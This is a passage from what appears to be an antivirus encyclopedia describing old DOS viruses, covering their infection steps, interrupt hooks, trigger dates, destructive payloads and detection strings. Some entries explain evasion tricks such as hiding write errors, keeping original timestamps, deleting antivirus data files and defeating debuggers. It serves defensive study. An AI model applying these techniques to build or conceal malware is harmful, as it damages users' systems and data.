1) Sets the disk transfer area, 114C:0816h.
2) Tries to infect COM and EXE files in the same directory and
other directories specified in PATH. It uses the Find First
Match Directory Entry, there it infects all EXE and COM files.
Then the Next Directory Entry, there it also infects all
EXE and COM files.
3) Sets DTA again, 114C:0080h.
4) Displays the message stored in the virus code.
[Sarampo.B]
Virus Type: File Virus (COM and EXE files)
Eff Length : 1371 bytes
Symptoms :
Increase in size of infected COM and EXE files by 1371 bytes
and decrease in available memory by 1664 bytes. Executing programs
may slow down due to the infection procedure of the virus.
General Comments:
During the first infection, the virus allocates 1664 bytes in the
memory and transfers its code to HMA. It also hooks INT 21 and INT 24.
Then rebuilds the carrier program while it is memory resident so it can
return control to the original routine.
This virus infects all opened, executed and copied COM and EXE
files. It also changes the file's time to 1:13pm.
SARAMPO displays some garbage on the screen if the system date
is April 25, December 25 or October 12, and the virus is already
resident for about 2 minutes.
This text is found in the virus code:
"Do you like this Screen Saver ? I hope so."
"Created by Sarampo virus"
[Hare.7610]
Virus Type: File Virus
Virus Length:
Virus Infect Type: COM and EXE files and
Master Boot Record
Place of Origin:
Virus Memory Type: High Memory
PC Vectors Hooked: Int 21h
Infection Procedure:
1) NOTs the data in CS:[DI] or 115C:2822 with a CX value of ED5h.
Then another encryption starting at 115C:29B2 with a CX value of
E0Eh,
2) XORs AX with an initial value of 2726.
3) Increments AH and AL by 2h.
4) Gets the memory size service with a return value of AX=280h.
5) Gets the dos variable and loads it to the high memory from 115C:2810
to 9DDE:0 with a size of 1DBAh. A message can be found there which
reads: "HDEuthanasia by Demon Emperor: Hare Krsua, hare, hare"
6) Hooks Int 21h and sets it. From there it infects the master boot
record.
[Hare.7750]
Virus Type: File Virus
Virus Length:
Virus Infect Type: COM and EXE files and
Master Boot Record
Place of Origin:
Virus Memory Type: High Memory
PC Vectors Hooked: Int 21h
Infection Procedure:
1) Encrypts data, address 115C:[2824], 3866 times by using the NOT
operand. Another loop in 115C:[29B2], 3667 times by XORing
to AX. AH and AL are incremented by 2h, thus producing:
"INFECTUM.COM.HOSTA.COMCOM.COMMAND\SYSTEM\IOSUBSYS\HSFLOP.PDR"
2) Gets the memory size, 640 bytes.
3) Gets the dos variable.
4) Loads the code to the high memory, from 115C:2810 to 9DD5:0000
(7750 bytes).
5) Returns the disk drive parameters to read the hard disk.
Reads disk sectors, 1 sector to be transferred to address
9DD5:2096, track no. 108, sector no. 1, head no. 125.
6) Executes the following codes:
XOR AL,AL
OUT 43,AL
JMP 94C
IN AL,40
MOV AH,AL
IN AL,40
XOR AL,AH
XCHG AL,AH
The virus first infects the MBR, from there it waits for COM
and EXE files to infect.
Damage: When rebooting, the computer reboots repeatedly.
[Markt]
Virus Type: File Virus, Soft Mice
Other Name: WERBE
Virus Length: 1533 bytes
Original Name: WERBE
Place of Origin: Germany
PC Vectors Hooked:
Infection Procedure:
1) Decrypts 1412 bytes of its virus code.
2) Gets the DTA address and then sets it.
3) Checks the current drive and then overwrites the boot sector
of the hard disk.
Damage:
Upon loading the virus it overwrites all the boot sectors
of all fixed drives, thus destroying them.
This message can be found in the virus code:
"Ups, all Disks from"
"C: to Z: Trashed!"
"Sorry about that!"
"to all Military Inventors its time to give us the Tachyonator!"
"MediaMarkt WerbeVirus '94 (c)"
"MediaMarkt Germany The Wizard"
Note: After destroying the hard disk the virus executes the
following code:
17AC:0575 JMP 0575
This code performs an endless loop.
[Leon.1217]
Virus Type: Polymorphic, File Virus (EXE files)
Virus Length: 1,224-1,253 bytes
Virus Memory Type: Non-memory resident
Place of Origin:
PC Vectors Hooked: INT 24h
Infection Procedure:
The virus only infects .EXE files. It increases an infected file's
size by 1,224-1,253 bytes. The virus infects the host file by attaching
itself at the end of the file. As a polymorphic virus, it first
decrypts its program using XOR 1410H to each encrypted word. Then it
hooks INT 24H to disable the disk write error display when it is
infecting its host file. Then it checks the current disk directory and
searches for EXE files. After finding a file it changes its attribute
to archive. Then it checks for the current time. If it is between the
7th-60th minute of an hour, and between the 30th-60th second of a
minute, the virus closes the file and does not infect. Any time beyond
that, the virus infects every EXE file in all the subdirectories of
the current drive. The virus is not memory resident. It only activates
upon loading and executing an infected file. It will be obvious when
the virus infects .EXE files in the current drive for it takes a long
time, depending on the number of .EXE files in the current drive, to
load a file.
Damage: It slows down the loading of executable files.
Symptom:
1) Infected files increase by 1,224-1,253 bytes.
2) Very slow loading of executable files.
[Karnavali.1972]
Virus Type: File Virus
Other Name:
Virus Length:
Place of Origin:
PC Vectors Hooked:
Infection Procedure:
1) Gets the dos variables.
2) Reads drive C:. Reads FFFFh sectors, with starting sector
5945h and 139E:0889h memory address for data transfer.
3) Tries to write 4 sectors to drive C:. After writing, EXE and COM
files that are executed will not get infected.
After rebooting the system, the system will hang and the keyboard
will be disabled.
[Tecla]
Virus Name: BARR1303
Virus Type: Polymorphic, File Virus
Other Name: TECLA
Virus Length: 2051 bytes
Virus Infect Type: COM and EXE files
Trigger Condition: September 23
Virus Re-infect: No
Virus Memory Type: High Memory Resident
Place of Origin:
PC Vectors Hooked: INT 16h, INT 21h, INT 24h
Infection Procedure:
The virus is a polymorphic type and infects both .COM and .EXE files.
It adds 1303 bytes to an infected file. It first decrypts its code,
which is attached to the host, using SUB 75H to each byte. It can be
seen from the decrypted data area of the virus code string "SSta
Tecla(MAD1)" which gives another name to the virus. It copies its
program (1033 bytes) to the high memory, 9F9A:0100; thus, overlaps
the video adapter memory. Once resident in the memory it checks if
the date is September 23. If it is, it activates its payload by
hooking to INT 16H (change to vector 9F9A:017C) and changes the
keyboard ASCII table. It increments all the unextended keyboard input
by 1 ASCII character. Thus, a keyboard input of "A" will display "B",
or an input of "." will display "/", and so on. Without the trigger
date it still hooks to INT 21h by changing its vector to its program
in the high memory 9F9A:016C to infect every loading and executing
program. It also hooks to INT 24h and changes its vector to 9F9A:0107
which is seen to give no payload.
Damage: Changes unextended keyboard input to an increment of 1 ASCII
character.
[Barrotes.1310.A]
Virus Name: BARR1310
Virus Type: File Virus
Other Name:
Virus Length: 1310 bytes
Virus Infect Type: .COM and .EXE files
Trigger Condition: January 5
Virus Re-infect: No
Virus Memory Type: High Memory Resident
Place of Origin:
PC Vectors Hooked: INT 1Ch, INT 21h
Infection Procedure:
The virus is a file type virus that infects both .COM and .EXE files.
It adds 1303 bytes to an infected file. It copies its program to the
high memory at 9F9C:0100; thus, overlapping with the video adapter
memory. It hooks to INT 21H by changing its vector to point to its
program at 9F9C:017B. This will allow the virus to infect loading
and executing files. Once it becomes resident in the memory it checks
the date. If it is January 5, it will change the interrupt vector of
INT 1CH to point to its program in the high memory at 9F9C:049F. Then
it overwrites the MBR of drive C; thus, destroying its partition. Since
INT 1CH is a clock tick interrupt, the program it is pointing to is
executed 18.2 times per second. The program at this interrupt displays:
"Virus BARROTES pro OSoft" on a blue background, and four vertical,
flickering bars across the screen. At this point, the machine can still
be used if the user can tolerate the eye straining bars.
Damage:
1) Destroys drive C's MBR and partition table.
2) Corrupts the video display.
[Cascade]
Virus Name: CAS1701A
Virus Type: Polymorphic, File Virus
Other Name:
Variant: CASCADE.1704
Virus Length: 1,701 bytes
Virus Infect Type: .COM files
Virus Re-infect: no
Virus Memory Type: Memory resident, MCB type
Place of Origin:
PC Vectors Hooked: INT 21h
Infection Procedure:
The virus only infects .COM files. It increases an infected file's size
by 1,701 bytes. The virus infects the host file by attaching itself at
the end of the file.
It is memory resident and can be activated upon loading and executing
an infected .COM file. As a polymorphic virus, it first decrypts its
code. Then the virus copies its 1701 bytes program in the low memory,
after the DOS resident programs. Then it hooks to INT 21H by changing
its vector to point to its program at 17F8:031C. It uses the
interrupt's service 4BH to attach itself to the host file. After
attaching itself to the host, it encrypts its main program and writes
the new file to the disk. It was seen that the virus checks the current
year before it infects the host file, and the trigger year is 1988.
Matching this year, which will not happen unless there's something
wrong with the system clock, there is no payload seen.
The virus occupies 1,984 bytes in the memory when checked using DOS
CHKDSK.
Symptom:
1) Infected files increase by 1,701 bytes.
2) Decreases the memory by 1,984 bytes.
[Natas-1]
Alias: Never-1
Origin:
Eff Length: 1788 bytes
Virus Type: File Virus; Encryption Virus; .COM files only
Symptoms :
Infected files increase by 4744 bytes, decrease in available
memory by 6144 bytes. Program execution slows down.
General Comments:
The virus first decrypts 2300 bytes of its code and then
allocates 6144 bytes into the High Memory Area. It will then copy a
part of its code to the area where INT 1 Vector is pointing to thus
replacing it. Then it will move 5111 bytes to the High Memory
Area. It will then hook INT 10, 13, 15 and 21.
Further analysis of the virus was not possible because it has replaced
the code for INT 1 which is the Single Step Interrupt which is used
by debuggers like DEBUG and S-ICE. NATA4744 will format a track
on the hard disk every time INT 1 is used, and it will continue to do
so until all local fixed drives are formatted.
This message is found in the virus code:
"Time has come to pay (c) 1994 NEVER-1"
[S_Bug.A]
Virus Type: Polymorphic Virus
Eff Length: 3500-5500 bytes
Virus Status:
Symptoms :
Increase in the size of infected COM and EXE files by 3500-5500
bytes and decrease in available memory by 10272 bytes. Executing
programs may slow down due to the infection procedure of the virus.
General Comments:
This virus is a very complex and highly polymorphic virus. It will
first decrypt 3504 bytes of its virus code and then allocate 10 kbytes
of memory. It will then be resident in the High Memory Area. It will
also hook INT 21h with infection triggers with services 3D, 4B and 6C.
Files infected by the virus are more likely to have file sizes as this
virus randomly assigns codes for decryption of the real virus code
which is 3504 bytes. File sizes may be from 3500 bytes to 5500 bytes.
All COM and EXE files that are opened, executed or copied will be
infected if the following condition is satisfied COMSPEC=COMMAND.COM.
This condition is also the trigger of the virus if it is resident or
not.
This message is found in the virus code:
"Satan Bug Virus - Little Loc"
[Smeg.Pathogen]
Alias: SMEG v0.1
Origin : United Kingdom
Eff Length : 4432-4447 bytes
Virus Type:
Symptoms :
Increase in file size of EXE and COM programs with a size of
4432-4447 bytes and decrease of 7872 in available memory.
General Comments:
On the first infection, this virus will first allocate 7872 bytes in
the High Memory Area and then transfer 3700 bytes of its code to that
area. It will then hook INT 21, INT 13, INT 20 and will make
INT 3 as INT 21.
Pathogen is very complex and it is a polymorphic type of virus.
This virus will infect COM and EXE files that are opened, executed
and copied. It will also display a "Memory allocation Error" when
an infected file attempts to be memory resident.
The danger Pathogen brings is that when the system date is Monday and
the time is 5:00 - 5:59 PM it writes zeroes onto the sectors of
the hard disk randomly, thus destroying some, if not all, of the data
in the drive. It will also trash or reset the BIOS of the computer.
The virus displays the following messages on the screen:
"Your hard-disk is being corrupted, courtesy of PATHOGEN!"
"Programmed in the U.K. (Yes, NOT Bulgaria) (c) The Black Baron 1993-4"
"Featuring SMEG v0.1 : Simulated Metamorphic Encryption Generator"
" 'Smoke me a kipper, I'll be back for breakfast.....!"
"Unfortunately some of your data won`t!!!!!"
[Cawber]
Virus Type: Polymorphic
Virus Length: 2010 bytes
Virus Memory Type: Non-memory resident
Place of Origin:
PC Vectors Hooked:
Infection Procedure:
The virus is a polymorphic type that first decrypts its decryptor using
63 bytes of data in its viral code. Each byte, as stored in the AX
register, is decrypted using SHL AX,1 and is added to the BP register.
The final result stored in BP after 63 decryptions will be the
decryptor. The virus then decrypts its 2,010 bytes code using XOR AX,
BP, where AX contains a word of the encrypted virus code. How it
allocates memory to make itself memory resident was not seen and its
hook to any interrupts. There is also no infection trigger.
[Sayha]
Virus Type: File Virus
Virus Length:
Virus Re-infect: Does not reinfect
Virus Memory Type: High Memory
Place of Origin:
PC Vectors Hooked: Int 21h
Infection Procedure:
1) Loads itself to high memory, loading approximately 9040 bytes.
2) Infects *.COM and *.EXE files by attaching itself to the host
program.
3) Moves the virus code by batches, copying its code 2 bytes at a time
in different locations.
Damage:
1) Increases file size.
2) Occupies space in HMA.
Symptom: Delay in program execution.
[SCITZO]
Virus Type: File Virus
Virus Length: Approximately 1329 bytes
Virus Memory Type: High Memory
Place of Origin:
PC Vectors Hooked: Int 21h
Infection Procedure:
1) Loads itself to high memory, allocating 1360 bytes (using MEM).
2) Moves 1329 (0531H) bytes to high memory.
3) Infects *.COM and *.EXE files. Copies the virus code to the host
program, adding approximately 1329 bytes. Loads the virus first
before running the host program.
The virus when resident in memory, will infect any executed *.COM and
*.EXE files. It does not do anything special. It just replicates when
it is memory resident. Infects only executed files.
Damage:
1) Free memory decreases.
2) Infected files increase in length.
3) Adds approximately 1329 bytes.
Symptom: Delay in program execution due to virus activity.
Detection method: Locate the virus text strings.
[Necros]
Origin: Tralee, Co. Kerry, Ireland
Eff Length: 1164 bytes
Virus Type: File Virus; Encryption Virus; .COM files
Symptoms :
It will increase com files by 1164 bytes, decrease in available
memory by 2624 bytes. Execution of running programs slows down.
A write-protect error appears when a program is opened and the disk
is write protected.
General Comments:
This virus will first decrypt its code with a size of 1142 bytes and
then will hook INT 3, INT 21 and INT 1C. Then it will allocate 2624
bytes in the memory. This virus will be MCB resident after executing
the carrier program because it will execute a TSR command.
It will immediately infect .COM files that are executed. When .EXE
files are run, Necros will create a hidden .COM file of the same name
and will increase the file size to 1164 bytes.
The Necros virus will check if the system date is November 21. If
this condition is satisfied then it will start to produce a countdown-
like sound 2 minutes after the virus has been loaded. This will go
on for 15 seconds before this message is displayed on the screen:
"Virus V2.0 (c) 1991 Necros the Hacker."
"Written on 29,30 June in Tralee, Co. Kerry, Ireland"
"Happy Birthday, Necros!"
[Helloween.1376]
Virus Type: File Virus
Other Name:
Virus Length:
Virus Infect Type: EXE and COM files
Trigger Condition: November 1
Place of Origin:
Virus Memory Type: High Memory Type
PC Vectors Hooked: Int 21h
Infection Procedure:
1) Loads itself into the high memory immediately copying from
address 1155:0129h to 9F89:0000h, copying 1376 bytes.
2) Hooks INT 21h.
3) Gets the Real-Time Clock date, and returned values are in BCD.
4) Checks whether the date is November 1. If yes, it clears the screen,
background color is red and this message appears in the
middle of the screen:
"Nesedte porad u pocitace a zkuste jednou delat neco
rozumneho!"
"**************"
"!! Poslouchjte HELLOWEEN - nejlepsi metalovou skupinu !!"
Then by pressing any key, the machine will reboot. Making
no infection.
But if the date is not November 1, the COM and/or EXE
files that are executed will get infected.
Detection method : Infected files increase up to 1376 bytes.
[Delta.1163]
Virus Type: Polymorphic, File Virus
Other Name:
Virus Length: 1163 bytes
Original Name: DELTA
Virus Infect Type: .COM and .EXE files
Trigger Condition: November 4
Virus Re-infect: no
Discovery Date: February 1996
Virus Memory Type: High memory resident
Place of Origin: Brazil
PC Vectors Hooked: INT 21H
Infection Procedure:
As a polymorphic virus it first decrypts its main program using XOR C0H
to each byte. It infects its host by attaching itself at the end of the
file. It adds 1,163 bytes to an infected file. Then it copies its
program in the high memory at 9F69:0000 and jumps there. It hooks INT
21H by pointing its vectors to 9F69:01C5. The virus can become memory
resident upon loading and executing an infected file.
Being memory resident it can attach itself to an executable file when
the file uses service 4BH of the hooked INT 21H. During infection the
virus checks if the current month is November and the current day is
4. At this time the virus resets the drive C:\ BIOS configuration and
changes the boot sequence to search drive C:\ first upon bootup. Then
waits for 30 sec. before making a warm boot. The following messages
appear:
"Good bytes from (DEL)ta Virus!!!"
" Reset in 30 seconds. "
After which, the hard disk will be disabled, as if it already has a
corrupted partition table. Upon infecting an executable file it makes
its second infection to COMMAND.COM in drive A:\; thus, corrupting it
and disabling proper bootup. The effect of the payload can be easily
solved by reconfiguring the hard disk in the BIOS and replacing the
infected COMMAND.COM with a new one since the virus doesn't write to
the MBR. Other text strings can be seen inside the virus code beside
the one displayed upon execution of the payload which is:
"Brazil - 02/96"
Damage:
1) Resets the hard disk BIOS configuration.
2) Corrupts COMMAND.COM.
Symptom: Infected files increase by 1163 bytes.
[Delwin.1759]
Virus Type: Polymorphic, Boot/File Virus
Virus Length: 2048 bytes
Virus Infect Type: .COM and .EXE files
Virus Re-infect: no
Discovery Date:
Virus Memory Type: High memory resident
Place of Origin:
PC Vectors Hooked: INT 13h, INT 21h, INT 1Ch
Infection Procedure:
Infecting the Master Boot Sector:
The virus primarily infects the Master Boot Sector of drive C:\. As
a polymorphic virus it first decrypts 1,714 bytes of its code using XOR
9B. Then it reads the boot sector of drive C:\ in its program. It saves
a copy of this sector to head 0, cylinder 0, sector 2 of drive C:\.
Then in makes a byte output twice to port 70H whose purpose is unknown
due to the unavailability of hardware port reference. The virus makes a
copy of its program, occupying 4 sectors, to head 0, cylinder 0, sector
3 of drive C:\. Then the virus modifies the first 46 bytes of the boot
sector copied in its program and writes it back to the boot sector of
drive C:\
Infecting Executable Files:
Once the virus has infected the boot sector of drive C:\ it becomes
memory resident upon system bootup. Upon bootup it first allocates space
in the high memory starting at 9E70:0000. Then it reads its program,
which occupies 4 sectors, from the infected drive C:\ starting from
sector 3, cylinder 0, head 0 to its allocated space in the high memory
(9E70:0100). From there it hooks to INT 13H and INT 21H to point to its
program in the high memory which will enable the virus to attach itself
to any loading and executing .COM or .EXE file. Then after hooking to
the interrupts it retrieves the original boot sector from head 0,
cylinder 0, sector 2 of drive C:\ to resume normal bootup. At this point
the virus is already memory resident and can infect executable files
when loaded, executed and copied. It first searches for COMMAND.COM to
infect.
The virus infects the file by attaching itself at the end of the host
file. However, its attachment most of the time is not complete and
sometimes just corrupts the program so the size added to the infected
file is not definite. No trigger or payload exists.
Damage: Corrupts executable files.
Symptom: Slows down file loading and execution time.
[Lemming.2160]
Virus Type: File Virus
Place of Origin:
Virus Memory Type: Non resident type
PC Vectors Hooked: Int 21
Infection Procedure:
1) Encrypts data from 114C:[SI+BP],XOR to 49h producing a message
that reads:
"TBDRV SP"
"The Rise and Fall of ThunderByte-1994-Australia"
"You will Never Trust Anti-Virus Software Again!!"
"[LEMMING] ver .99"
"TBAVTBSCANNAVVSAFEFPROT"
"COMcomEXEexe"
2) Gets the dos variable and points to "[LEMMING] ver .99."
While the virus is memory resident, a write-protect error will
appear if the user tries to execute an EXE or COM file with a
write-protected disk.
[Wulf.1500-1]
Other Name: Wulf
Virus Type: File Virus
Virus Length: Approximately 1500 bytes
Virus Memory Type: High Memory
Place of Origin:
PC Vectors Hooked: Int 13h, Int 21h
Infection Procedure:
1) Loads itself to high memory after decryption, allocating 2976 bytes
(9F46:0000).
2) Moves 1500 (05CCH + 0010H) bytes onto the high memory.
3) Infects *.EXE files. Copies the virus code to the host program,
adding approximately 1500 bytes. Loads the virus first before
running the host program.
4) While memory resident, the virus infects all executed EXE files.
The virus reacts ordinarily by allocating space in the memory before
infecting files. Nothing extraordinary happens. It just attaches its
code to the host program after it is loaded from the memory.
Damage:
1) Decrease in free memory.
2) Increase in file size.
Symptom: May display
"TBMEMXXXTBCHKXXXTBDSKXXXTBFILXXXPSQRW"
"[WULF] (c) 1995-96 Werewolf"
"CLEAN.AVP.TB.V.SCAN.NAV.IBM.FINDV.GUARD.FV.CHKDSK"
which appears in the virus code.
Detection method: Decrypt the virus code, then look for the above
strings.
[Teraz.2717]
Virus Type: File Virus
Virus Length: Approximately 2717 bytes
Virus Re-infect: Does not re-infect, infected file size is consistent
Virus Memory Type: Non Resident
Place of Origin:
PC Vectors Hooked: Int 21h
Infection Procedure:
Directly infects *.COM and *.EXE files. Copies the virus code to the
host program, adding approximately 2717 bytes. Loads first the virus
before running the host program.
The virus, when executed, infects any executed *.COM and *.EXE files.
It does not do anything special. It just replicates when it
is resident in the memory. Only infects executed files.
Damage:
1) Increase in file size.
2) Adds approximately 2717 bytes.
Symptom:
Delay in program execution due to virus activity.
[N-Xeram]
Other Name: Xeram
Virus Type: File Virus
Virus Length: Approximately 1667-1678 bytes
Virus Re-infect: Does not re-infect, infected file size is consistent.
If the file is already corrupted it skips and looks
for another EXE file.
Virus Memory Type: Non Resident, Direct Infector
Trigger Condition: Checks for system date. If the day is the 13th of
any month, it will name itself N-XERAM. Otherwise,
it will name itself plainly as XERAM.
PC Vectors hooked: Int 21h
Infection Procedure:
Directly infects *.EXE files when an infected file is executed. Copies
the virus code to the host program, adding approximately 648 bytes.
Loads first the virus before running the host program.
Special note: The virus initially searches for *.COM files. It picks
COMMAND.COM first, and infects it. After infecting COMMAND.COM,
the virus searches for *.EXE files. It does not search for *.COM files
again. It only searches for *.EXE.
The virus first gets the system date to compare the day (to
establish the name), then sets DTA. The virus then searches for *.EXE
files within the directory using Int 21 (4E). When the search is
successful, the virus gets the file's attribute using Int 21 (43).
It changes its attribute to enable the write function,
(especially for the COMMAND.COM). It takes note of the file time and
date using Int 21 (51) so that when it accomplishes its task of
altering the code, it can save it using the original file time and
date. This therefore deceives the user that the file was never been
changed.
After the alteration, the virus then protects itself from the following
anti-virus programs, by deleting it using Int 21 (41):
1. /NCDTREE/NAV_._NO
2. /CHKLIST.MS
3. /SCANVAL.VAL
These files are virus information or data files used by the respective
anti-virus programs. We can classify this virus as an anti-anti-virus
virus.
*Every time an infected file is executed, one EXE file is infected
within the same directory.
Damage:
1) Increase in file size, adds approximately 1667-1678 bytes.
2) Corrupts COMMAND.COM, making it unusable. Adds 1674 bytes.
Infected EXE files run normally.
Symptom: Delay in program execution due to virus activity.
[Despro11]
Virus Type: Polymorphic, File Virus
Virus Length: 2,406-2,409 bytes
Virus Infect Type: .COM and .EXE files
Virus Re-infect: no
Virus Memory Type: High memory resident
Place of Origin:
PC Vectors Hooked: INT 21h, INT 24h
Infection Procedure:
The virus infects .COM and .EXE files. It increases an infected file's
size by 2,406 bytes for .COM file and 2,409 for .EXE files. The virus
infects the host file by attaching itself at the end of the file. The
virus can become memory resident upon loading and executing an
infected .COM or .EXE file. As a polymorphic virus, it first decrypts
its code, then the virus allocates space in the high memory starting
at 9E80:0000. Then it copies its code there to stay resident. Once
resident it hooks to INT 21H by pointing its vector to its program
in the high memory at 9E80:01BC. The virus uses this interrupt to be
able to attach itself to the loading and executing files using service
4BH of the interrupt. During infection it will first hook to INT 24H
(Critical Error Handler) to disable the error display during a host
file write error, thus, the infection will not be obvious. Then it
will search for COMMAND.COM in the root directory of the current drive
and infect it if it is still not infected. Thus, after the next bootup
in the same drive, the virus will immediately become resident, infecting
the executable files that will be loaded in the memory. Then finally,
it will infect the current file that has been loaded in the memory. The
virus sometimes cannot attach itself completely to its host file, and
thus, just corrupting it. There is no payload or trigger.
Damage: Corrupts COMMAND.COM and executable files which can cause the
system to hang.
Symptom:
Increases the host's file size by 2,409 bytes for .COM file and
2,406 bytes for .EXE file.
[Neuroquila]
Alias:
Place of Origin:
Eff Length: 4622 bytes
Virus Type: File Virus, Encryption Virus
General Comments:
The NEUROQUI virus will decrypt a part of its code at the beginning of
its execution and will decrypt 4622 bytes. Then it will copy this to
the OS area 0000:7C00. Then it will hook INT 1.
[Keypress-6]
Virus Type : File Virus
Other Name :
Virus Length :
Place of Origin :
Virus Memory Type : High Memory Type
PC Vectors Hooked : Int 21h, Int 1Ch
Infection Procedure:
1) Saves the values of all the registers.
2) Loads itself to the high memory, 9FA3:100 loading 1216 bytes.
3) Hooks Int 21h and Int 1Ch (Timer Tick Interrupt), sets a value,
then returns the original values to the registers.
[Screaming_Fist]
Other Name: SFIST696
Virus Type: File Virus
Virus Length: Approximately 675 bytes (moves 696 bytes to memory)
Virus Memory Type: High Memory
Place of Origin:
PC Vectors Hooked: Int 21h
Infection Procedure:
1) Loads itself to high memory, loading approximately 2,048 (9F80:0000)
bytes.
2) Infects *.COM and *.EXE files. Copies the virus code to the host
program, adding approximately 696 (02B8H) bytes. Loads first the
virus before running the host program.
3) While in the memory, the virus infects all executed COM and EXE
files.
The virus code is decrypted. The virus reacts ordinarily by allocating
space in the memory before infecting files. Nothing extraordinary
happens. It just attaches its code to the host program after it is
loaded from the memory.
Symptom:
1) Decrease in free memory.
2) Increase in file size.
3) May display:
"Screaming Fist IIV"
which appears in the decrypted code.
Actual recognizable string: "C:\COMMAND>COM.Screaming Fist IIV"
Detection method: Decrypt the virus code before detection. Check for
the above strings.
[PH33R.1332-1]
Alias:
Origin :
Eff Length : 1332 bytes
Symptoms :
Increase in file size of EXE, COM, and DLL programs with a size of
1332 bytes and decrease of 2672 in available memory. When in a
write-protected floppy, it usually displays a "Write Protect
Error" message when there is an attempt to read from it.
General Comments:
On the first infection, this virus will first allocate 2672 bytes in
the High Memory Area and then transfer 1332 bytes of its code to that
area. It will then hook INT 21 with infection procedures to
services 4B(Execute Program), 6C(Extended Open Create), 56(Rename
File), and 43(Get File Attributes).
This virus will infect all EXE, COM, DLL files that are opened,
renamed, or executed. It will also avoid files that ends with the
string "AV" (NAV, TBAV), "AN" (PCSCAN, SCAN) and "DV".
The virus is named as such because of the string "PH33R" found in the
virus code.
[Changsha]
Virus Type: Parasitic, File Virus
Virus Length: 3,072-3,091 bytes
Virus Infect Type: .COM and .EXE files
Trigger Condition: Sunday
Virus Re-infect: no
Discovery Date: 1991
Virus Memory Type: Memory resident, MCB type
Place of Origin: Changsha China
PC Vectors Hooked: INT 8h, INT 13h, INT 21h
Infection Procedure:
The virus infects both .COM and .EXE files. It increases the infected
file's size by 3,072 for .COM and 3,091 for .EXE. It infects its host
by attaching itself at the end of the file. The virus allocates its
memory resident code in the low memory after the DOS resident programs.
The virus code will become memory resident upon loading, executing,
and copying an infected file. While resident in the memory it can
infect executable files by doing the same. It hooks INT 21H by
pointing its vector to its program in the low memory at 17F8:01C0. A
hook to this interrupt will enable the virus to attach itself to the
host. It also hooks INT 8H (changed to 17F8:02E1) and INT 13H (changed
to 17F8:0BED) but the payload is not seen.
In its hook to INT 21H it gets the current date and if the current day
is Sunday, it will load itself and infect all the executable files in
the current directory. It will be noticed that the date and time
attributes of infected files at this day will be set to 1-1-94 and
1:15a. The infected files at this day will also be corrupted and will
not run properly. Other than Sunday the virus will just replicate
itself to the file. If checked from DOS CHKDSK.EXE the memory
occupied by the virus is 3,344 bytes. The following text strings can
be seen inside the virus code:
"Auto-Copy Deluxe R3.00"
"(C) Copyright 1991. Mr YaQi. Changsha China"
"No one can Beyond me!"
Damage: Corrupts COM and EXE files.
Symptom:
1) Increases the host's file size by 3,072-3,091 bytes.
2) Sets the time and date attributes to 1-1-94, 1:15a.
[Chao.1241]
Virus Type: Parasitic, File Virus
Virus Length: 1,241-1,247 bytes
Original Name: CHAOS
Virus Infect Type: .COM and .EXE files
Virus Re-infect: no
Virus Memory Type: Memory resident, MCB type
Place of Origin:
PC Vectors Hooked: INT 21h, INT 13h, INT 24h
Infection Procedure:
The virus infects both .COM and .EXE files. It can become memory
resident upon loading and executing an infected file. It increases
the size of an infected file by 1,241 bytes for .COM file and
1,247 bytes for .EXE file.
Upon activation the virus stays resident in the low memory, after
the DOS resident programs. It hooks INT 21H by pointing its vector
to its program in the low memory at 1808:020E to enable it to attach
to executing files using the 4BH service of the interrupt. It also
hooks INT 24H (Critical Error Handler) to disable the error message
display during a host file write error. After the virus has loaded
itself in the memory it first checks the current date. If it is
September 13 the payload will be executed. The following trigger
dates were also seen:
Every 9th day of 1997
" 10th " " 1998
" 11th " " 1999 .... and so on
The following formula describes how to determine the trigger day for
the current year:
Trigger Day = (Current Year - 1988)
The payload executed by the virus during the date of trigger just hangs
the system after infecting the loading and executing file. It then
clears the screen and displays:
"I see, I come, I conquer...Trojan horse - CHAOS v2.0 by
Faust".
The virus occupies 1,840 bytes of the memory as checked using DOS
CHKDSK.
Damage: Hangs the system.
Symptom: Infected files increase by 1,241 for .COM and 1,247 for .EXE.
[Chill]
Virus Type: Polymorphic, File Virus
Virus Length: 544 bytes
Virus Infect Type: .COM files
Virus Re-infect: no
Virus Memory Type: High memory resident
Place of Origin:
PC Vectors Hooked: INT 21h
Infection Procedure:
The virus only infects .COM files. It increases an infected file's size
by 544 bytes. The virus infects the host file by attaching itself at the
end of the file. As a polymorphic virus, it first decrypts its 544 bytes
code using XOR 6AH to each byte. Then the virus allocates 1200 bytes in
the high memory (9FB4:0000) and copies its code there to stay resident.
Then it hooks INT 21H by changing its vector to point to its program in
the high memory (9FB4:00B9). The virus will become memory resident upon
loading and execution of an infected file. Once it has become resident
it will infect other .COM files when it is loaded and executed because
it uses the altered service 4BH of INT 21H which first attaches the
virus code into the host file before giving control to the host. It
also sets the date attribute of the infected file to 01-01-94.
Damage: None
Symptom: Increases the host's file size by 544 bytes.
[Three_Tunes]
Virus Type:
Virus Length: Approximately 1784 bytes
Virus Re-infect: Does not re-infect, infected file size is consistent
Virus Memory Type: High Memory
Place of Origin:
PC Vectors Hooked: Int 21h, Int 1Ch
Infection Procedure:
1) Loads itself to high memory, allocating 2304 bytes (9F70:0000).
2) Infects *.EXE files. Copies the virus code to the host program,
adding approximately 1784 bytes. Loads first the virus before
running the host program.
While memory resident, the virus infects any executed *.EXE files.
It does not do anything special. It just replicates when it is resident
in the memory. Only infects executed files.
Damage:
1) Free memory decreases by approximately 2304 bytes.
2) Increase in file size. Adds approximately 1784 bytes.
Note:
The virus checks first if the current month is June using Int 21 (2A).
If it is, it triggers the virus code; otherwise, it just exits the
program. Then, the virus checks for the system time using Int 21 (2C).
It uses a special formula that is used to select which payload to
execute. There are 4 possible payloads which will be discussed later.
But first, the formula:
Int 21 (2C):
Significant register CX,
Adds CH to CL and returns the sum to CL (Add CL,CH)
uses the AND boolean between CL,03 (And CL,03)
clears CH to 00 (XOR CH,CH)
compares Cl to 4 possibilities (CMP CL,+03)
The virus uses this procedure to get 00, 01, 02, 03 as values for CL.
Each value corresponds to a certain tune. (03 doesn't have a tune to
play) When the infected file is run, a specific tune depending on the
time and the result after manipulating the time is played. A total of
three tunes are played. Whatever tune is played, infection remains
the same, even if it plays nothing.
Symptom:
1) Delay in program execution due to virus activity.
2) Plays various tunes.
[Phx.96S]
Alias:
Origin:
Eff Length: 965-968 bytes
Virus Type:
Symptoms:
Infected EXE and COM files increase by 965-968 bytes and
there is a decrease of 1024 in the available memory. When in
a write-protected floppy, it usually displays a "Write Protect
Error" message when an attempt to read it is made.
General Comments:
On the first infection, this virus will first allocate 1024 bytes in
the High Memory Area and then transfer 965 bytes of its code to that
